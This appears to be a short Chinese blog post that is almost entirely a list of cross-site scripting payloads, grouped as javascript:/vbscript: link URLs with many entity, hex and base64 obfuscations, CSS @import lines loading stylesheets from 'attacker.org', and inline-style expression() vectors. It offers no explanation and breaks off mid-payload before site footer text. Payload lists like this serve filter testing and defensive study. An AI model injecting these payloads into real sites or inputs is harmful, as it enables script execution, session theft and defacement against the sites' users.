XSS-LOG-2

2018-10-20  本文已影响21人  jiaoyurun

#第一类:Javascript URL

<a href="javascript:alert('test')">link</a>

<a href="java&#115;cript:alert('xss')">link</a>

<a href='vbscript:MsgBox("XSS")'>link</a>

<a href="vbscript:alert(1)">Hello</a>

<a href="vbscript&#058;alert(1)">Hello</a>

<a href=javascript:alert(&quot;XSS&quot;)>link</a>

<a href=`javascript:alert("RSnake says,'XSS'")`>link</a>

<a href=javascript:alert(String.fromCharCode(88,83,83))>link</a>

<a href="javascript&colon;alert(1)">link</a>

<a href="javaSCRIPT&colon;alert(1)">Hello</a>

<a href="javasc&NewLine;ript&colon;alert(1)">link</a>

<a href="javas&Tab;cript:\u0061lert(1);">Hello</a>

<a href="jav    ascript:alert('XSS')">link</a>

<a href="jav&#x09;ascript:alert('XSS')">link</a>

<a href="jav&#x0D;ascript:alert('XSS')">link</a>

<a href=" &#14;  javascript:alert('XSS');">link</a>

<a href="javascript:\u0061lert&#x28;1&#x29">Hello</a>

<a href="javascript:confirm`1`">link</a>

<a href="javascript:confirm(1)">link</a>

<a href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">1</a>

<a href="javascript:%61%6c%65%72%74%28%31%29">link</a>

<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a>

<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a>

<a href=javascript:eval("&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;")>link</a> 

<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>link</a>

<a href=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>link</a>

<a href=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>link</a>

<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a>

<a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+>1</a>

<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

#第二类:CSS import

<style>@import url("http://attacker.org/malicious.css");</style>

<style>@imp\ort url("http://attacker.org/malicious.css");</style>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE>@import'http://jb51.net/xss.css';</STYLE>

#第三类:Inline style

<div style="color: expression(alert('XSS'))">

<div style=color:expression\(alert(1))></div>

<div style="color: '<'; color: expression(alert('XSS'))">

<div style=X:expression(alert(/xss/))>

<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">

<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">

<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

<DIV STYLE="background-image: url(

上一篇下一篇

猜你喜欢

热点阅读